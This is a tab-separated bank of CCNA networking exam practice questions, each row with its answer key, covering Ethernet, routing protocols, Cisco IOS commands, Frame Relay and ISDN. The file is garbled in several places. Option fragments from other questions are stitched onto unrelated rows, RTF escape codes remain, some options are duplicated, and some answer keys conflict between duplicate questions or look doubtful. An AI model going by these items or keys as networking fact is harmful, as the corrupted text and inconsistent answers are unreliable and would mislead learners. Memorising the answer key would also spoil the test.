B,C	#CCNA Q. 304	Which of the following statements are true regarding full-duplex Ethernet when compared to half-duplex Ethernet? (Choose two.)	^A: Full-duplex Ethernet consists of a shared broadcast domain, while half-duplex Ethernet consists of a private broadcast domain.	^B: Full-duplex Ethernet is collision free, while half-duplex Ethernet is subject to collisions.	^C: Full-duplex Ethernet provides higher throughput than half-duplex Ethernet of the same bandwidth.	^D: Full-duplex Ethernet provides lower throughput than than half-duplex Ethernet of the same bandwidth.	^E: Full-duplex Ethernet consists of a shared cable segment, while half-duplex Ethernet provides a point-topoint link.						
C	#CCNA Q. 271	You have just finished configuring a router. The changes have been made successfully and everything is working correctly. You then save your changes and reboot the router. None of your changes are active after reboot. However, when you look at the contents of startup-config, your changes are there: Which of the following indicates the source of the problem?	^A: Hardware failure NMVRAM prevents the router from loading the configuration.	^B: Startup-config in flash is corrupt and cannot be analyze^D:	^C: Router configuration register set to bypass startup configuration.	^D: Startup-config in NVRAM is corrupt and cannot be analyzed							
C	#CCNA Q. 247 	What is the default encapsulation type for Frame Relay on a Cisco router? 	^A: HDLC 	^B: PPP 	^C: IETF 	^D: Cisco 	^E: ANSI 						
C	#CCNA Q. 110	What is the most common Layer 2 device?	^A: Hub	^B: Router	^C: Switch	^D: Repeater							
D	#CCNA Q. 165	What is the most common mail to device?	^A: Hub	^B: Router	^C: Repeater	^D: Switch							
B	#CCNA Q. 305	Which device can be used to segment broadcast domains?	^A: hub	^B: router	^C: bridge	^D: repeater							
C,D,E	#CCNA Q. 239 	Which devices can be used to segment a network? (Choose three) 	^A: hub 	^B: repeater 	^C: switch 	^D: bridge 	^E: router 	^F: media converter 					
C	#CCNA Q. 216 	Which type of LAN segmentation device enables high-speed data exchange? 	^A: Hub 	^B: Bridge 	^C: Switch 	^D: Repeater 							
A	#CCNA Q. 288	A user issues the command ping 204.211.38.52. Which of the following physical is used to test physical connectivity between the two devices?	^A: ICMP echo request	^B: Information request	^C: timestamp reply	^D: redirect	^E: source quench						
C,E,F	#CCNA Q. 244 	Which of the following are options for Frame Relay lmi types? (Choose three) 	^A: IETF 	^B: Q931 	^C: Q933A 	^D: IEEE 	^E: CISCO 	^F: ANSI 					
B,C	#CCNA Q. 253 	Which of the following statements describe the codes displayed in the show ip route command? (Choose two.) 	^A: I-Indicates a route was learned through an Internal protocol. 	^B: S-Indicates a route was learned through static comman^D: 	^C: R-Indicates a route was learned through RIP 	^D: .S-Indicates a route was learned through a serial port. 	^E: R-Indicates a route was learned through a reliable port. 						the testing application.
A	#CCNA Q. 211 	What is the result of using hierarchical addressing framework? 	^A: Increase availability of addresses. 	^B: Decrease distance between routers. 	^C: Increase router memory requirements. 	^D: No need to maintain routing information. 							
B	#CCNA Q. 55	What must you do to test connectivity on a dial-on-demand routing (DDR) link?	^A: Increase the idle timeout parameter.	^B: Send interesting traffic across the link.	^C: Reboot one of the Integrated Services Digital Network (ISDN) routers.	^D: Reset the DDR Integrated Services Digital Network (ISDN) router statistics to zero.							
B,C,E	#CCNA Q. 21	What are the effects of sustained, heavy collisions in CSMA/CD LANs? (Choose three)	^A: Increased broadcast traffic	^B: Delay	^C: Low throughput	^D: High throughput	^E: Congestion	^F: Higher bandwidth					
B	#CCNA Q. 286	What must you do to test connectivity on a dial on demand routing (DDR) link?	^A: Increate the idle import parameter	^B: Send interesting traffic across the link	^C: Switch	^D: Repeater							
B	#CCNA Q. 287	You got a new testing application on a new server in your office. This testing application work with a few hosts. The new server and hosts work with 10 Mbps and make a bandwidth problem for all the rest nontesting hosts. The rest of the hosts in your office network with 2 Mbps. What is the most economical decision would you implement for resolving this problem?	^A: Install new 100 Mbps switches, and change all host's NIC to 100 Mbps.	^B: Segment network with router, and place all testing hosts and the new server into a separate subnet (network).	^C: Add a Bridge and separate the two networks							
A	#CCNA Q. 282	What output interface status would you see if peer interface (on second end of link) is administratively down?	^A: interface is down, line protocol is down	^B: interface is down, line protocol is up	^C: interface is up, line protocol is down	^D: interface is up, line protocol is up						
A	#CCNA Q. 91	Which command specifies a second subinterface on serial interface zero?	^A: interface s 0.2 point - to point	^B: interface 2 s 0 point to point	^C: sub interface 2 s 0 point to point	^D: interface 0 sub 2 point to point	^E: interface s 0.1 point to point sub 2					
C	#CCNA Q. 156	What is the connection-oriented protocol in the TCP/IP protocol stack?	^A: IP	^B: UDP	^C: TCP	^D: DNS	^E: OSPF					
D	#CCNA Q. 212 	What is the link state routing protocol in the TCP/IP protocol stack? 	^A: IP 	^B: IS-IS 	^C: NLSP 	^D: OSPF 	^E: RIP ver 2 					
D	#CCNA Q. 148	Which encapsulation methods are most commonly used with dialup integrated services Digital Network (ISDN)?	^A: IP and IPX	^B: IP and PPP	^C: PPP and SDLC	^D: PPP and HDLC						
B,D	#CCNA Q. 93	Which two statements accurately define IP addressing rules? (Choose Two)	^A: IP multicast addresses start with 240	^B: A host portion of all 1\rquote s indicates a network broadcast	^C: The value of zero (0) in the host portion means \ldblquote all hosts\rdblquote  on the network	^D: IP addresses are four octets long and contain a network portion and a host portion						
A,C,E	#CCNA Q. 82	Which three statements about common elements of the TCP/IP protocol stack are true? (Choose three)	^A: IP provides connection less service and routing capabilities.	^B: ARP enables devices to locate the IP address of local devices.	^C: UDP provides simple connection less service without windowing or acknowledgements.	^D: ICMP provides connection oriented management data to routers and layer three switches.	^E: TCP enables devices to send large quantities of data using switching in a connection-oriented	manner.				
A	#CCNA Q. 206 	What is the protocol and what is the second part of the following network address? 255255255255	^A: IP, a flooded broadcast 	^B: IP, a directed broadcast 	^C: IPX, a flooded broadcast 	^D: IPX, a remote directed broadcast 						
C	#CCNA Q. 161	When you configure an IP address on a Cisco Router, which command starts the IP processing on the interface?	^A: IP-Space enable	^B: Network IP-Address	^C: IP address IP-address subnet mask.	^D: The exit command from the enable configuration	^E: Copy running-configuration to startup-configuration					
C	#CCNA Q. 291	Given an IPX network with redundant paths, what command will configure load balancing?	^A: ipx load-balance	^B: ip maximum-paths 2	^C: ip maximum-paths 2	^D: ipx load-share						
C	#CCNA Q. 283	What is the protocol and what is the second part of the following network address? (Choose all that apply.) 172.161.0.254 mask 255.255.0.0	^A: IPX MAX address 	^B: IP Class C director broadcast 	^C: Private IP address node number 	^D: Public IP address directed broadcast 	^E: Private IP address directed broadcast 					
C	#CCNA Q. 70	What is the protocol and what is the second part of the following network addresses 172.16.0.254 , mask=255.255.0.0?	^A: IPX:MAC addresses.	^B: IP:classC directed broadcast.	^C: Private IP address:node number	^D: Public IP addresses:directed broadcast.	^E: Private IP addresses directed broadcast.					
A	#CCNA Q. 310	Which of the following WAN services use two data link layer encapsulations, one for data and one for signaling?	^A: ISDN	^B: Frame Relay	^C: ATM	^D: FDDI						
B	#CCNA Q. 4	Which IOS command is used to associate an ISDN phone number with the next hop router address?	^A: isdn destination number	^B: dialer map	^C: isdn spid1	^D: isdn line number						^D: That a bridge be placed between the enterprise server and all other users with the exception of
B,C	#CCNA Q. 119	Which two statements about integrated services digital network (ISDN) are true? (Choose two)	^A: ISDN provides only data only capability.	^B: ISDN provides an integrated voice/data capability.	^C: The ISDN standards define the hardware and call setup schemes for end-to-end digital connectivity.	^D: Users receive more bandwidth on WANs with a leased line of 56kbps than with multiple b channels.						
A	#CCNA Q. 22	Modem networks are often described as using 100Base-TX components. What is meant by the term Base' in this definition?	^A: It describes the signaling method for communication on the network.	^B: It refers to the type of media used in the network.	^C: It relates to the speed of transmission of network signals.	^D: It defines the allowable length of media that can be use^D:	^E: It defines half-duplex or full-duplex operation.		
C,D	#CCNA Q. 54	What are two characteristics of the RARP protocol? (Choose two.)	^A: It generates parameter problem messages.	^B: It maps IP addresses to Ethernet addresses.	^C: It maps Ethernet addresses to IP addresses.	^D: It is implemented directly on top of the data link layer.			
A	#CCNA Q. 52	What is a benefit of a virtual LAN (VLAN)?	^A: It increases the number of broadcast domains.	^B: It decreases the number of broadcast domains.	^C: It increases the number of collision domains.	^D: It decreases the number of collision domains.	^E: Since it is a virtual interface, it never shuts down.		
A	#CCNA Q. 14	What is the result of segmenting a network with a bridge?	^A: It increases the number of collision domains.	^B: It decreases the number of collision domains.	^C: It increases the number of broadcast domains.	^D: It decreases the number of broadcast domains.			
D	#CCNA Q. 75	What is the result of segmenting a network with a router into segments 1 and 2?	^A: It increases the number of collisions.	^B: It decreases the number of broadcast domains.	^C: It connects segment one\rquote s broadcast to segment two.	^D: It prevents segment one\rquote s broadcast from getting to segment two.			
B,E	#CCNA Q. 192	Assuming no subnetting, which two pieces of information can be derived from the IP address 144.132.25.10? (Choose Two)	^A: It is a Class C address	^B: It is a Class B address	^C: The network address is 144.0.0.0	^D: The network address is 144.132.25.0	^E: The host portion of the address is 25.10		
A	#CCNA Q. 164	Which statement about the data-link connection identifier (DLCI) is true?	^A: It is a number that identifies a local virtual circuit in Frame Relay network.	^B: It is a signaling standard between the CPE device and the Frame Relay switch.	^C: It is check speed port speed of the connection (local loop) to the Frame Relay clou^D:	^D: It is maximum number of uncommitted bits that the Frame Relay switch will attempt to transfer	beyond the committed information rate (CIR).		
A	#CCNA Q. 47	Which of the following are not true of standard half-duplex Ethernet circuitry?	^A: It is alternate one-way communication.	^B: The receive (RX) is wired directly to the transmit (TX) of the remote station.	^C: The receive (TX) is wired directly to the receive (RX) of the remote station.	^D: Collisions are not possible.	^E: Both stations can transmit simultaneously.		
C	#CCNA Q. 126	What is a backoff on an 802.3 network?	^A: It is latency in store and forward switchin^G:	^B: It is the time used for token passing for machine to machine.	^C: It is the retransmission delay that is reinforced when a collision occurs.	^D: It is the result of two nodes transmitting at a same time the frames from each transmitting device	collide and are damage^D:		
C	#CCNA Q. 189	What is back off on an 802.3 network?	^A: It is latency stored and forward switchin^G:	^B: It is the time used to token passing from machine to machine.	^C: It is re transmission delay that is encountered when a collision occurs.	^D: It the result of two nodes transmitting at the same time the frames from each transmitting device collide	and are damage^D:		
D	#CCNA Q. 138	What are the characteristics of UDP?	^A: It is reliable and acknowledged	^B: It is unreliable and acknowledged	^C: It is reliable and unacknowledged	^D: It is unreliable and unacknowledged			
A	#CCNA Q. 72	Which statement about the Committed Information Rate (CIR) is true?	^A: It is the rate, in bits per second, at which the Frame Relay switch agrees to transfer data	^B: It is the clock speed (port speed) of the connection (local loop) to the Frame Relay cloud	^C: It is the maximum number of bits that the switch can transfer during any Committed Rate	Measurement Interval	^D: It is a signaling standard between the CPE device and the FR switch. It is responsible for managing	the connection and maintaining status between the devices.	
D,F	#CCNA Q. 62	Which two statements about IP RIP are true? (Choose two.)	^A: It limits hop counts to 31.	^B: It is a link-state routing protocol.	^C: It uses autonomous system numbers.	^D: It is capable of load sharing over multiple paths.	^E: It uses bandwidth as the metric for path selection.	^F: It broadcasts updates every 30 seconds by defaults	
B	#CCNA Q. 63	How does inter-VLAN communication take place?	^A: It takes place through any Cisco router.	^B: It takes place through a Cisco router than can run ISL.	^C: It takes place through a router, but this disables all the router's Security and filtering functionality for the	VLANs.	^D: For nonroutable protocols, (e.g., NetBEUI) the router provides communications between VLAN	domains.	^E: Inter-VLAN communications is not possible because each VLAN is a separate broadcast domain.
B	#CCNA Q. 81	Using the TCP/IP suite a message is sent from host A to a destination IP address on the same LAN. How does host A determine the destination\rquote s MAC address?	^A: It uses a Proxy ARP.	^B: It uses ARP requests.	^C: It uses RARP requests.	^D: It uses router look up table.			
A,B,C,G	#CCNA Q. 74	What are four function/characteristics of the network layer of the OSI model? (Choose four)	^A: It uses a two-part address.	^B: It maintains routing tables.	^C: It uses broadcast addresses.	^D: It establishes network addresses.	^E: It provides access to the LAN medi^A:	^F: It provides media independence for upper layers.	^G: It provides path selection for Internet work communication.
B,C	#CCNA Q. 233 	Which two statements about the store and forward switching method are true? (Choose two) 	^A: Latency remains constant regardless of frame size. 	^B: Latency through the switch varies with frame length. 	^C: The switch receives the complete frame before beginning to forward it. 	^D: The switch checks the destination address as soon as it receives the header and begins forwarding the 	frame immediately. 				
E	#CCNA Q. 183	Which command assigns the login password Cisco on the console terminal line?	^A: line vty 0	Log in	Password Cisco	^B: Line console	Login	Password Cisco	^C: Line login terminal	Password Cisco	^D: Line console 0
D,E	#CCNA Q. 261	Which of the following are used to prevent routing loops in network that use distance vector routing protocols? (Choose two.)	^A: link-state advertisement (ISA	^B: Spanning Tree Protocol	^C: shortest path first tree	^D: split horizon	^E: hold-down timers				
A,B,E	#CCNA Q. 76	Which three basic switch functions increase available bandwidth on the network? (Choose three)	^A: Loop avoidance.	^B: Address learning	^C: Hop count limiting	^D: Broadcast filtering	^E: Packet forward/filterin^G:				
A,B	#CCNA Q. 139	What are the two sublayers of the data link layer? (Choose two)	^A: MAC	^B: LLC	^C: SAP	^D: LCP	^E: NetWare Core Protocol (NCP)				
A	#CCNA Q. 199	You telnet to a host on a remote network. Which MAC address will be present in the ARP table when you issue the show arp command?	^A: MAC address of the destination host Ethernet port.	^B: MAC address of the local router Ethernet port	^C: MAC address of the destination router Serial port	^D: MAC address of the local router Serial Port					
A,C,D	#CCNA Q. 242 	Which of the following should be done prior to backing up an IOS image to a network server? (Choose three) 	^A: Make sure that the network server can be accesse^D: 	^B: Check that the authentication for access is set. 	^C: Assure that the network server adequate space for the code image. 	^D: Verify any file naming and path requirements. 	^E: Make sure that the server can load and run the bootstrap code. 				
B,C	#CCNA Q. 285	Which of the following metrics does IGRP use by default to determine the best path to destination? (Choose two.)	^A: Maximum Transmission Unit	^B: Cumalative Interface delay.	^C: Path bandwidth value.	^D: Reliability from source to destination.	^E: Link loading in bits-per-secon^D:	^F: Hold-down timers for updates.			
A,B,E	#CCNA Q. 10	Which devices operate at all seven layers of the OSI model? (Choose three)	^A: Network host	^B: Network management station	^C: Transceiver	^D: Bridge	^E: Web server	^F: Switch			
A,C	#CCNA Q. 135	Which are two ways IPX supports multiple logical networks on an individual interface? (Choose two)	^A: Network number	^B: Routing protocol	^C: Encapsulation type	^D: Autonomous system number					
C	#CCNA Q. 118	What are two components of an IPX address?	"^A: Network number; IP address."	"^B: MAC address; node number."	"^C: Network number; MAC address."	"^D: Network number; subnet number."					
A,C	#CCNA Q. 324	Which of the following are generally considered to be characteristics of connectionless network services? (Choose two.)	^A: non-reliable	^B: reliable	^C: less bandwidth-intensive	^D: handshaking					
B,D	#CCNA Q. 246 	In contrast to connectionless services, which of the following are generally regarded as characteristics of  connection-oriented network services? (Choose two.) 	^A: non-reliable 	^B: reliable 	^C: less bandwidth-intensive 	^D: handshaking 					
A,B	#CCNA Q. 263	Which of the following need to be modified in the password recovery process? (Choose two.)	^A: nvram	^B: configuration register	^C: boot flash	^D: cmos\'a8	^E: flash				
C	#CCNA Q. 87	How many collisions are caused by transmitting and receiving frames simultaneously in a full-duplex Ethernet Technology?	^A: One	^B: Two	^C: None	^D: Several					
C	#CCNA Q. 316	Based on the debug output shown, what type of handshake occurred for PPP authentication? 	^A: one-way 	^B: two-way 	^C: three-way 	^D: no handshake required during authentication. 					
A	#CCNA Q. 231	What is a disadvantage of using a connection-oriented protocol such as TCP? 	^A: Packet acknowledgement may add overhead 	^B: Packets are not tagged with sequence numbers 	^C: Loss or duplication of data packets is more likely to occur 	^D: The application layer must assume responsibility for correct sequencing of the data packets. 		
C	#CCNA Q. 116	What is an advantage of using a connectionless protocol such as UDP?	^A: Packet acknowledgement may reduce overhead traffi^C:	^B: Loss or duplication of data packets is less likely to occur.	^C: Packets are not acknowledged which reduces overhead traffi^C:	^D: The application relies on the transport layer for sequencing of the data packets.		
C	#CCNA Q. 53	IP RIP routing is configured on a router, but all interfaces attach to RIP network. What should you use to prevent all RIP routing updates from being sent through selected interfaces without using access lists?	^A: Passive route	^B: Default routes	^C: Passive interface	^D: Route update filtering		
B	#CCNA Q. 45	Which of the following commands applies to an access control list to a router interface?	^A: permit access-list 101 out	^B: ip access-groups 101 out	^C: apply access-list 101 out	^D: access-class 101 out	^E: ip access-list e0 out	
A	#CCNA Q. 241 	What is the effect of the following access list condition? access.list 101 permit ip 10.25.30.0 0.0.0.255 any 	^A: Permit all packets matching the first three octets of the source address to all destinations. 	^B: Permit all packets matching the last of the destination address and accept all source address. 	^C: Permit all packets from the third subnet of the network address to all destinations. 	^D: Permit all packets matching the host bits in the source address to all destinations. 	^E: Permit all packets to destination matching the first three octets in the destination address.. 	
F	#CCNA Q. 12	At which OSI layer does data translation and code formatting occur?	^A: Physical	^B: Data link	^C: Network	^D: Transport	^E: Session	^F: Presentation
A	#CCNA Q. 318	Which command sends and receives ICMP echo messages to verify connectivity from host to host?	^A: ping	^B: tracert	^C: netstat	^D: show cdp neighbors details	^E: show ip route	^F: traceroute 
A,D,F	#CCNA Q. 20	Which commands could be used at the command line interface to troubleshoot LAN connectivity problems on a router? (Choose three)	^A: ping	^B: tracert	^C: ipconfig	^D: show ip route	^E: winipcfg	
B,C	#CCNA Q. 295	Which of the following are application layer protocols? (Choose two.)	^A: Ping	^B: Telnet	^C: FTP	^D: TCP	^E: IP	
A,B	#CCNA Q. 26	Which two commands allow you to verify address configuration in your internetwork?	^A: Ping	^B: Trace	^C: Verify	^D: Test IP	^E: Echo IP	^F: Config IP
A,D	#CCNA Q. 84	Which two protocol tools use ICMP? (Choose two)	^A: Ping	^B: Telnet	^C: Configure	^D: Trace route	^E: Show commands	^F: Standard access list
D	#CCNA Q. 307	You are unable to telnet to a router at address 203.125.12.1 from a workstation with the IP address of 203.125.12.23. You suspect that there is a problem with your protocol stack. Which of the following actions is most likely to confirm your diagnosis?	^A: ping 127.0.0.0	^B: ping 203.125.12.1	^C: telnet 127.0.0.1	^D: ping 127.0.0.1	^E: tracert 203.125.12.1	
A,B	#CCNA Q. 266	What do you use for loop avoidance? (Choose two.)	^A: Poison reverse.	^B: Split horizon.	^C: Link state protocol.			
A,D	#CCNA Q. 143	Which two WAN data link layer protocols support multiple upper layer protocols? (Choose Two)	^A: PPP	^B: LAPD	^C: ISDN	^D: HDLC		
C	#CCNA Q. 147	Which statement about the Point-to-Point protocol (PPP) is true?	^A: PPP supports TCP/IP, but not Novell IPX	^B: PPP is being phased out of existence by the Serial Line Internet protocol	^C: PPP provides router-to-router and host-to-network connections over both synchronous and	asynchronous circuits.	^D: PPP is an ITU-T and ANSI standard that defines the process for sending data over a packet-switched	data network
C,D,E	#CCNA Q. 151	What are three benefits of integrated services digital network (ISDN)? (Choose three)	^A: PVCs are faster and more reliable.	^B: No specialized equipment is require^D:	^C: Data transfer is faster than typical modems.	^D: Call setup is faster than with standard telephone service.	^E: It carries many types of data traffic such as voice, video, and dat^A:	
D	#CCNA Q. 298	Which type of router memory normally stores the start-up configuration?	^A: RAM	^B: ROM	^C: FLASH	^D: NVRAM										
A	#CCNA Q. 303	What function does the up arrow key provide within the Cisco router IOS?	^A: Recalls the previous command line.	^B: Moves the cursor one line ip.	^C: Redisplays the current command line.	^D: Capitalize the command line.										
A,C	#CCNA Q. 223 	Which two statements about a reliable connection oriented data transfer are true? (Choose two) 	^A: Recipients acknowledge receipt of dat^A: 	^B: When buffers are filled to capacity, datagrams are discarded and not re transmitted. 	^C: Windows are used to control the amount in outstanding acknowledged data segments. 	^D: If the segments timer expires between receipt of an acknowledgement the sender drops the connection. 	^E: The receiving device waits for acknowledgements from the sending device before accepting more data 	segments. 								
A,B,F	#CCNA Q. 293	Which of the following are associated with the Presentation Layer of the OSI model? (Choose three)	^A: Rich Text Format (RTF)	^B: Quick Time movie	^C: FTP	^D: TFTP	^E: SMTP	^F: MIDI					Password CISCO	^E: Line console 0	Login	Password Cisco
C	#CCNA Q. 38	Which of the following protocols utilizes features of both distance-vector and link-state routing?	^A: RIP	^B: OSPF	^C: EIGRP	^D: IGRP										
B	#CCNA Q. 176	Which router component stores routing tables, ARP cache, and packet buffers?	^A: ROM	^B: RAM	^C: NVRAM	^D: Flash memory										
A	#CCNA Q. 162	When you issue the command show version, your router returns: -Configuration register is 0x0101- From where does the router boot?	^A: ROM	^B: NVRAM	^C: FLASH	^D: A TFTP server										
E	#CCNA Q. 109	Which line from a show spantree 1 command output indicates that virtual LAN1 (VLAN1) is functioning properly?	^A: Root port is fast Ethernet 0/26	^B: Port Ethernet 0/1 of VLAN is forwarding	^C: Designated port is Ethernet 0/1, path cost 10	^D: Designated root has priority 0 address 00D0.588^F:B600	^E: VLAN is executing the IEEE compatible spanning tree protocol.									
B	#CCNA Q. 80	What is a function of a reliable transport layer connections.	^A: Route selection	^B: Acknowledgement	^C: Session checkpoints	^D: System authentication										
E,F,G	#CCNA Q. 207 	Which three protocols exactly match their transport layer functions? (Choose three) 	^A: Route selection-IP 	^B: Sliding window-UDP 	^C: Well known ports-IP 	^D: Route validation-ICMP 	^E: Connection oriented-TCP/IP 	^F: Three way handshake TCP/IP 	^G: No acknowledgement-UDP 							
A	#CCNA Q. 89	Which commands should you use to enable IGRP routing?	^A: router igrp 100	network 192.168.1.0	network 10.0.0.0	^B: router igrp 100	network 192.168.1.0	network 10.2.0.0	^C: router igrp 100	network 192.168.1.0 192.168.1.1	network 10.2.0.0 10.2.1.1					
D	#CCNA Q. 301	Rachel is adding a balanced hybrid routing protocol to her network. Which of the following commands would she use to start the routing process?	^A: router rip	^B: router igrp 100	^C: router ospf 1	^D: router eigrp 100										
B	#CCNA Q. 227 	Which command would you use to enable IP RIP version 1 on a router? 	^A: Router RIP 	network 172.16.1.0 	network 10.1.0.1 	^B: Router RIP 	network 172.16.0.0 	network 10.0.0.0 	^C: Router RIP 	network 172.16.1.0 172.16.1.1 	network 10.1.0.0 10.1.1.1 					
D	#CCNA Q. 120	Which prompt and command combination sets RIP as the routing protocol?	^A: Router# rip.	^B: Router rip.	^C: Router (Config)# rip.	^D: Router (Config)# router rip.										
C	#CCNA Q. 98	Which router command allows you to view the entire contents of all access lists?	^A: Router# show interface	^B: Router> show IP interface	^C: Router# show access-list	^D: Router> show all access list										
A	#CCNA Q. 97	Which router command allows you to determine if an IP access list is enabled on a particular interface?	^A: Router# show ip interface	^B: Router> show access-list	^C: Router# show ip access-list	^D: Router> show interface ip access-list										
B	#CCNA Q. 65	Which configuration mode and command combination sets the bandwidth metric of a Frame Relay connection?	^A: router(Config)# clock rate 56	^B: router(Config-if)# bandwidth 56	^C: router(Config)# bandwidth 56000	^D: router(Config-if)# clock rate 56000								
C	#CCNA Q. 202	Which command sets IGRP as the routing protocol for autonomous system 100? 	^A: Router(config)# igrp 100 	^B: Router(config)# network 100 	^C: Router(config)# router igrp 100 	^D: Router(config)# enable igrp 100 						^E: Access List 101 deny IP 128.12.22.55 TCP EQ 20 21 23		
A	#CCNA Q. 289	"How do you change the Console password to """"cisco""""? """	^A: Router(config)# line con 0 Router(config-line)# login Router(config-line)# password cisco	^B: Router(config)# line con 0 Router(config-line)# login Router(config-line)# password Cisco										
D	#CCNA Q. 144	Which command enables directly connected network 199.55.72.0 to be used by RIP?	^A: Router(Config)# rip 199.55.0.0	^B: Router(Config-router)# rip 199.55.72.0	^C: Router(Config-router)# network 199.55.0.0	^D: Router(Config-router)# network 199.55.72.0								
C	#CCNA Q. 312	Which command correctly configures an IP address on a Cisco router interface?	^A: router(config-if)# ip address 172.18.32.1 subnet mask 255.255.252.0	^B: router(config-if)# 172.18.32.1 255.255.252.0	^C: router(config-if)# ip address 172.18.32.1 255.255.252.0	^D: router(config-if)# 255.255.252.0 subnet mask 255.255.252.0	^E: router(config-if)# ip address 172.18.32.1/22	^F: router(config-if)# ip address 172.18.32.1 subnet mask /22						
B	#CCNA Q. 85	Which command successfully ping an individual IP address?	^A: Router>ping 192.5.5.0	^B: Router# ping 192.5.5.30	^C: Router> ping 192.5.5.256	^D: Router# ping 192.5.5.255	Answer: B							
D	#CCNA Q. 170	Which encapsulation type should be used for the e1 port of Router R3?	^A: SAP	^B: HDLC	^C: ARPA	^D: Novell-Ether								
B	#CCNA Q. 111	Which encapsulation type should be used for the S0 port of Router R2?	^A: SAP	^B: HDLC	^C: ARP	^D: NOVELLETHER								
B	#CCNA Q. 169	Which encapsulation type should be used for the S0 port of router R2?	^A: SAP	^B: HDLC	^C: ARPA	^D: Novel Ether								
D	#CCNA Q. 60	Which show interface serial 1 status statement indicates that the shutdown command was issued on that interface?	^A: Serial 1 is up, line protocol is up.	^B: Serial 1 is up, line protocol is down.	^C: Serial 1 is down, line protocol is down.	^D: Serial 1 is administratively down, the line protocol is down.								
C	#CCNA Q. 302	Which command must be entered when connecting two routers without external DCE devices via a serial linl?	^A: serial up	^B: line protocol up	^C: clock rate	^D: dce rate	^E: dte rate							
B	#CCNA Q. 133	At which layer of the OSI model does the ping command operate?	^A: Session	^B: Network	^C: Transport	^D: Maintenance							network 172.16.1.0 265.255.255.0 	Network 10.1.0.0 255.255.0.0 
B	#CCNA Q. 104	If you are in IOS user mode which command do you use to enter the privileged mode?	^A: Set	^B: Enable	^C: Configure	^D: Privileges								
A	#CCNA Q. 127	You have just issued an erase startup-config command and reloaded your router. In which mode will your router be when you reboot?	your router be when you reboot?	^A: Setup.	^B: Startup.	^C: User EXE^C:	^D: User privilege^D:	^E: Global configuration.							
A,D	#CCNA Q. 23	Which of the following are unique characteristics of half-duplex Ethernet as compared to full-duplex Ethernet? (Choose two.)	^A: Shared collision domain.	^B: Private collision domain	^C: Higher effective throughput	^D: Lower effective throughput	^E: Private broadcast domain							
C	#CCNA Q. 44	Which command is used to display the placement and direction of an IP access control list on a router?	^A: show access-list	^B: show ip route	^C: show ip interface	^D: show interface	^E: show interface list							
A	#CCNA Q. 191	Which command displays access list 111?	^A: Show access-list 111	^B: Show IP access list 111	^C: Display IP address list 111	^D: Display access-list 111 details						
D	#CCNA Q. 167	Which ex command displays system configuration information, software version and the names and sources of configuration files and boot images on a router?	^A: show boot	^B: show flash	^C: show Config	^D: show version						
B	#CCNA Q. 159	Which command displays the interfaces using a given access list?	^A: Show filters	^B: Show IP interface	^C: Show active list	^D: Show interface parameters	^E: Configure IP access list	^F: Show access-list interfaces				Login
B,C	#CCNA Q. 146	Which two commands show your access lists? (Choose two)	^A: Show filters.	^B: Show access-lists	^C: Show IP access-list	^D: Show running-Config						
E	#CCNA Q. 137	In Cisco IOS software, which command displays the backup configuration?	^A: show flash	^B: show version	^C: show tftp-config	^D: show backup-config	^E: show startup-config					
B,D	#CCNA Q. 269	Which commands will allow you to identify the local dlci number? (Choose two.)	^A: show frame-relay local-dlci	^B: show frame-relay pvc	^C: show frame-relay dlci	^D: show frame-relay map	^E: show ip route					
A	#CCNA Q. 132	Which command displays the IP addresses assigned to specific host names?	^A: show hosts	^B: show interface	^C: ping host name	^D: config host name	^E: show host mapping	^F: show host name IP address	^G: trace IP addresses host name			
A	#CCNA Q. 160	You have a Frame Relay Link on serial1. Which command displays the Local Management Interface (LMI), data link connection identifier (DLCI), and bandwidth for that link?	^A: show interface serial1	^B: show frame-relay serial1	^C: show protocol frame-relay serial1	^D: show serial1 encapsulation frame-relay						
B	#CCNA Q. 129	Which command verifies encapsulation as well as layer 1 and layer 2 statistics on a router configured for Frame Relay?	^A: show IP	^B: show interface	^C: show statistics	^D: show frame-relay						
C	#CCNA Q. 43	Which command will provide you with information regarding the Layer 3 configuration of directly connected router interfaces?	^A: show ip interface	^B: show cdb neighbors	^C: show cdp neighbors detail	^D: show ip route	^E: show ip link status					
B,C	#CCNA Q. 150	Your network is having IP problems connecting to one or more Frame Relay peer routers. Which two commands should you use to show the routers that are reachable? (Choose two)	^A: show IP map	^B: show IP route	^C: show frame-relay map	^D: debug frame-relay map						
C	#CCNA Q. 300	Which commands displays RIP routing updates as they are sent and received by the router?	^A: show ip protocols	^B: show ip route rip	^C: debug ip rip	^D: debug ip updates	^E: debug ip transactions					
B	#CCNA Q. 88	Which Cisco IOS command should you use to display the Novel IPX address assignments on a router?	^A: Show IPX addresses.	^B: Show IPX interface.	^C: IPX network <number>	^D: Display IPX addresses	^E: Show IPX routing details					
E	#CCNA Q. 90	Which show command should you use to view Frame Relay local management interface (LMI) traffic statistics?	^A: show lmi	^B: show ip route	^C: show interface	^D: show statistics	^E: show frame-relay lmi					
D	#CCNA Q. 28	Which command displays all routed protocols and the interfaces on which the protocol is enabled?	^A: show protocols	^B: show protocol brief	^C: show interfaces protocol	^D: show interfaces	^E: show routed	^F: show routed interfaces				
D	#CCNA Q. 2	Which command displays the configuration register setting?	^A: show register	^B: show flash	^C: show boot this IOS command displays the settings of the boot environment variables	^D: show version						
A	#CCNA Q. 214 	What is an advantage of local area network LAN segmentation? 	^A: Smaller collision domains. 	^B: Elimination of broadcast. 	^C: Decrease cost of implementation. 	^D: Larger number of users within the same domain. 						
A,D	#CCNA Q. 67	In order to enable RIP which two tasks need to be performed? (Choose two)	^A: Specify the routing protocol.	^B: Configure static Rip routes.	^C: Specify directly connected subnets.	^D: Specify directly connected networks.						
A,B	#CCNA Q. 177	Which two solutions are used to reduce the chance of distance vector routing loops. (Choose two)	^A: Split horizon	^B: Route Poison	^C: Area Hierarchies	^D: Link State Algorithms						
A,C	#CCNA Q. 140	Which two types of route table entries does a Layer3 router to determine the appropriate path to a destination use? (Choose two)	^A: Static route entry	^B: Default route entry	^C: Dynamic route entry	^D: Temporary route entry	^E: Permanent route entry					
A	#CCNA Q. 260	What type of switching create variable latency through the switch?	^A: Store-and-forward	^B: Cut-through	^C: Fragment-free							
B	#CCNA Q. 256 	In what switch mode read first part of frame with destination address and send frame immediately? 	^A: Store-and-forward 	^B: Cut-through 	^C: Fragment-free 							
C	#CCNA Q. 11	With the hierarchical numbering of IP addresses what determines the portion of the address that will identify the network number?	^A: Subnet Mask	^B: Dots between octets	^C: Class of first octet	^D: Assignments of DHCP	^E: Address Resolution Protocol					
